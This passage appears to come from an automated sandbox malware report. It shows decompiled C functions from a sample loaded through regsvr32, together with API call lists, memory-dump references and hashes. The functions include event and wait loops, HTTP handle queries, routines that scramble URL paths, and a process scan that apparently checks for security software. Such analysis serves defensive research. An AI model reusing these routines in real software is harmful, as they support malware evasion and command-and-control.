                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                                                    							L20:
                                                                                                                                                                                                                                    							if(_t25 != 0) {
                                                                                                                                                                                                                                    								CloseHandle(_t25);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L22;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E7A9A: lstrlen.KERNEL32(023E23E9,00000000,00000000,00000027,00000005,00000000,00000000,023E96DA,74666F53,00000000,023E23E9,023ED00C,?,023E23E9), ref: 023E7AD0
                                                                                                                                                                                                                                      • Part of subcall function 023E7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 023E7AF4
                                                                                                                                                                                                                                      • Part of subcall function 023E7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 023E7AFC
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(023ED2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,023E3CA0,?,00000001,?), ref: 023E432B
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,023E3CA0,00000000,00000000,?,00000000,?,023E3CA0,?,00000001,?,?,?,?,023E6880), ref: 023E4389
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,023E3CA0,?,00000001,?), ref: 023E43B7
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,023E3CA0,?,00000001,?,?,?,?,023E6880), ref: 023E43CF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                                                    • Opcode ID: a748e75ba75079baea220e1ace325caa2f58ecfdd9a2cfc402ffb99e9a9106f8
                                                                                                                                                                                                                                    • Instruction ID: f86705229ab76becdcc5bef8c15cc151c10fc28372191f7aaffe321770a26ee6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a748e75ba75079baea220e1ace325caa2f58ecfdd9a2cfc402ffb99e9a9106f8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED21D272A402359BCF315E68AC44B6A73ADAB8C724F050A15FB53DF2C4D771DC2D8690
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E023EA0B2(void* __ecx, void* __esi) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                                                    				long _t56;
                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t61 = __esi;
                                                                                                                                                                                                                                    				_t59 = __ecx;
                                                                                                                                                                                                                                    				_t60 =  *0x23ed144; // 0x23ead81
                                                                                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                                                                    					_v20 = _t34;
                                                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                    						_push( &_v8);
                                                                                                                                                                                                                                    						_push(_t61 + 0x2c);
                                                                                                                                                                                                                                    						_push(0x20000013);
                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                    						_v8 = 4;
                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                    						if( *_t60() == 0) {
                                                                                                                                                                                                                                    							_t39 = GetLastError();
                                                                                                                                                                                                                                    							_v12 = _t39;
                                                                                                                                                                                                                                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                                                    								return _v12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v16 = 0;
                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                    							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                    							_t58 = E023E2049(_v8 + 1);
                                                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                                                    								_v12 = 8;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_push( &_v16);
                                                                                                                                                                                                                                    								_push( &_v8);
                                                                                                                                                                                                                                    								_push(_t58);
                                                                                                                                                                                                                                    								_push(0x16);
                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                    								if( *_t60() == 0) {
                                                                                                                                                                                                                                    									E023E9039(_t58);
                                                                                                                                                                                                                                    									_v12 = GetLastError();
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                                                                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                                                                    					_v12 = _t56;
                                                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					_t42 = E023E1C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                                                                    					_v12 = _t42;
                                                                                                                                                                                                                                    				} while (_t42 == 0);
                                                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023ea177
                                                                                                                                                                                                                                    0x023ea17f
                                                                                                                                                                                                                                    0x023ea186
                                                                                                                                                                                                                                    0x023ea186
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76D681D0), ref: 023EA0C9
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 023EA0D9
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EA162
                                                                                                                                                                                                                                      • Part of subcall function 023E1C47: WaitForMultipleObjects.KERNEL32(00000002,023EAA72,00000000,023EAA72,?,?,?,023EAA72,0000EA60), ref: 023E1C62
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 023EA197
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 602384898-0
                                                                                                                                                                                                                                    • Opcode ID: 4ecbe3f8bd09a837c6067401f0d1cc788c562256597ce903bb53219328acdd60
                                                                                                                                                                                                                                    • Instruction ID: 78501847fd5d051c4ac1c053c6b5630b96ef65d5106a8f3afedcb12e28215e20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ecbe3f8bd09a837c6067401f0d1cc788c562256597ce903bb53219328acdd60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31E9B5D00318EFEF21DF95C8809AEBBBDFB08344F10496AE542E6581D770AA49DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                                                                                                                    			E023E3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                    				signed int* _t39;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t36 = __ecx;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                    				_t38 = E023E9763(__ecx,  &_v32);
                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                                                    						_t23 = _t16;
                                                                                                                                                                                                                                    						if( *_t16 != 0) {
                                                                                                                                                                                                                                    							E023EA022(_t23);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t38;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E023EA72D(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = CreateEventA(0x23ed2a8, 1, 0,  *0x23ed344);
                                                                                                                                                                                                                                    				if(_t40 != 0) {
                                                                                                                                                                                                                                    					SetEvent(_t40);
                                                                                                                                                                                                                                    					Sleep(0xbb8);
                                                                                                                                                                                                                                    					CloseHandle(_t40);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_push( &_v32);
                                                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                                                    					_t29 = E023E8A51(_t36);
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_t29 = E023E17D5(_t36);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v16;
                                                                                                                                                                                                                                    				_t38 = _t29;
                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                    					E023E1F99(_t41);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                    					_t38 = E023E42EA( &_v32, _t39);
                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    0x023e3c5a
                                                                                                                                                                                                                                    0x023e3c61
                                                                                                                                                                                                                                    0x023e3c61
                                                                                                                                                                                                                                    0x023e3c6d
                                                                                                                                                                                                                                    0x023e3c6e
                                                                                                                                                                                                                                    0x023e3c7c
                                                                                                                                                                                                                                    0x023e3c70
                                                                                                                                                                                                                                    0x023e3c70
                                                                                                                                                                                                                                    0x023e3c71
                                                                                                                                                                                                                                    0x023e3c72
                                                                                                                                                                                                                                    0x023e3c73
                                                                                                                                                                                                                                    0x023e3c74
                                                                                                                                                                                                                                    0x023e3c75
                                                                                                                                                                                                                                    0x023e3c75
                                                                                                                                                                                                                                    0x023e3c81
                                                                                                                                                                                                                                    0x023e3c86
                                                                                                                                                                                                                                    0x023e3c88
                                                                                                                                                                                                                                    0x023e3c8a
                                                                                                                                                                                                                                    0x023e3c8a
                                                                                                                                                                                                                                    0x023e3c91
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3c93
                                                                                                                                                                                                                                    0x023e3c93
                                                                                                                                                                                                                                    0x023e3ca0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3ca0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(023ED2A8,00000001,00000000,00000040,00000001,?,76D7F710,00000000,76D7F730,?,?,?,023E6880,?,00000001,?), ref: 023E3C42
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,023E6880,?,00000001,?,00000002,?,?,023E2417,?), ref: 023E3C4F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,023E6880,?,00000001,?,00000002,?,?,023E2417,?), ref: 023E3C5A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,023E6880,?,00000001,?,00000002,?,?,023E2417,?), ref: 023E3C61
                                                                                                                                                                                                                                      • Part of subcall function 023E8A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,023E3C81,?,023E3C81,?,?,?,?,?,023E3C81,?), ref: 023E8B2B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2559942907-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E023E788B(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                    				signed short _t23;
                                                                                                                                                                                                                                    				char* _t27;
                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				unsigned int _t33;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				unsigned int _t38;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t42 = __eax;
                                                                                                                                                                                                                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                    				_t38 = __eax;
                                                                                                                                                                                                                                    				_t30 = RtlAllocateHeap( *0x23ed238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                    				_v12 = _t30;
                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                    					_v8 = _t42;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t33 = 0x18;
                                                                                                                                                                                                                                    						if(_t38 <= _t33) {
                                                                                                                                                                                                                                    							_t33 = _t38;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t21 =  *0x23ed250; // 0x5977891f
                                                                                                                                                                                                                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                    						 *0x23ed250 = _t23;
                                                                                                                                                                                                                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                    						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                    						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                    						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                    						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                    						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                    						 *_t27 = 0x2f;
                                                                                                                                                                                                                                    						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                    						_t30 = _t13;
                                                                                                                                                                                                                                    					} while (_t38 > 8);
                                                                                                                                                                                                                                    					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,023E839A,00000000,?,?,023EA428,?,04CC95B0), ref: 023E7896
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 023E78AE
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,023E839A,00000000,?,?,023EA428,?,04CC95B0), ref: 023E78F2
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000001,?,00000001), ref: 023E7913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                                                    • Opcode ID: 6ed5fd27014142ed7b02587ce9b6171e3acae781fd754fef36b2f4ba58726cc8
                                                                                                                                                                                                                                    • Instruction ID: 11fd1dde20a3ce3ab5f5f0fc15c94903b8d8970d7418743f1937abd9abf0b7fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed5fd27014142ed7b02587ce9b6171e3acae781fd754fef36b2f4ba58726cc8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311CAB2E40115EFCB208A69DC84D9EBBEEDB95350F050566F5069B1C0E770DE18C750
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E023E7A9A(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t19 = 0x27;
                                                                                                                                                                                                                                    				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                    				E023E6B43(_t8, _t1);
                                                                                                                                                                                                                                    				_t16 = E023E2049(_t19);
                                                                                                                                                                                                                                    				if(_t16 != 0) {
                                                                                                                                                                                                                                    					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                    					_t13 = E023E86D8(_t3, _t16, _a8);
                                                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                                                    						__imp__(_a4);
                                                                                                                                                                                                                                    						_t19 = _t13 + 0x27;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t18 = E023E2049(_t19);
                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                    						 *_t18 = 0;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							__imp__(_t18, _a4);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__imp__(_t18, _t16);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E023E9039(_t16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                      • Part of subcall function 023E86D8: wsprintfA.USER32 ref: 023E8734
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(023E23E9,00000000,00000000,00000027,00000005,00000000,00000000,023E96DA,74666F53,00000000,023E23E9,023ED00C,?,023E23E9), ref: 023E7AD0
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023E7AF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 023E7AFC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                    • Opcode ID: 55d5fb6826479e230663fb1d93d2ee84065a4cdcf0daf8e965ba891aee17e7c7
                                                                                                                                                                                                                                    • Instruction ID: 637da58e7bf24c0842a098967e62aa3f00646a78e0ed4cef7b016491d0f56ae9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55d5fb6826479e230663fb1d93d2ee84065a4cdcf0daf8e965ba891aee17e7c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D01A77250022AE7CF22BAA59C84AEF7B6DEF84359F044422F906591C0DB75CE4DCBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E023E757F() {
                                                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                                                    				void* _v300;
                                                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t15 = 0;
                                                                                                                                                                                                                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                    				if(_t17 != 0) {
                                                                                                                                                                                                                                    					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                    					while(_t8 != 0) {
                                                                                                                                                                                                                                    						_t9 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t2 = _t9 + 0x23eee54; // 0x73617661
                                                                                                                                                                                                                                    						_push( &_v264);
                                                                                                                                                                                                                                    						if( *0x23ed0fc() != 0) {
                                                                                                                                                                                                                                    							_t15 = 1;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						CloseHandle(_t17);
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                    				return _t15;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023E758F
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 023E75A2
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 023E75CE
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 023E75DD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
• Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
• Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                    • Opcode ID: 2f934a7158a6da7c7e29ccab47129f5f1a645e83e67d5f42b9a9d94d3722861b
                                                                                                                                                                                                                                    • Instruction ID: b9b2a68196d575f175da2043b6123f1006d3c5ba2ca2fed363eb681b250b45ec
